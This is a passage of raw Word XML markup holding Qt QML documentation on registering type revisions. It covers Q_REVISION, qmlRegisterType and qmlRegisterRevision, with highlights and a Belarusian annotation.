        <w:t>Methods such as</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD015D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId233" w:anchor="Q_INVOKABLE" w:history="1">
        <w:r w:rsidRPr="00CD015D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Q_INVOKABLE</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CD015D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'s, signals and slots</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can also be tagged for a revision using the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD015D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Q_REVISION(x)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD015D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD015D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>macro</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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class</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CppType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public</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BaseType</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Q_OBJECT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Q_PROPERTY</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> root READ root WRITE setRoot NOTIFY rootChanged REVISION </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</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signals</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Q_REVISION</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> rootChanged</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DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To register the new class revision to a particular version the following function is used:</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keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>template</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>typename</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> T</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metaObjectRevision</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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qmlRegisterType(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>const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char</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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uri</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versionMajor</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versionMinor</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keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>const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char</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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qmlName)</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To register</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CppType</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>version 1 for</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MyTypes 1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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ln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qmlRegisterType</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CppType</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"MyTypes"</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"CppType"</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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Style w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is only available when</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MyTypes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>version 1.1 is imported.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B877FF" w:rsidRPr="00B877FF" w:rsidRDefault="00B877FF" w:rsidP="00DA77C2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B877FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Звярні ўвагу на тое, што тут два параметрычных аргументы.</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For the same reason, new types introduced in later versions should use the minor version argument of</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId234" w:anchor="qmlRegisterType" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qmlRegisterType</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>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FC3AA1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This feature of the language allows for behavioural changes to be made without breaking existing applications.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Consequently </w:t>
      </w:r>
      <w:r w:rsidRPr="008B0A55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML module authors should always remember to document what changed between minor versions</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="008B0A55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML module users should check that their application still runs correctly before deploying an updated import statement</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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You may also register the revision of a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3AA1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>base class</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that your type depends upon using the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId235" w:anchor="qmlRegisterRevision" w:history="1">
        <w:r w:rsidRPr="00FC3AA1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qmlRegisterRevision</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() function:</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keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>template</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>typename</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> T</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metaObjectRevision</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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qmlRegisterRevision(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>const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char</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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uri</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versionMajor</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versionMinor)</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keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>template</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>typename</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> T</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metaObjectRevision</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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qmlRegisterUncreatableType(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>const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char</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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uri</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versionMajor</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versionMinor</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keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>const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char</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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qmlName</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keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>const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QString</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
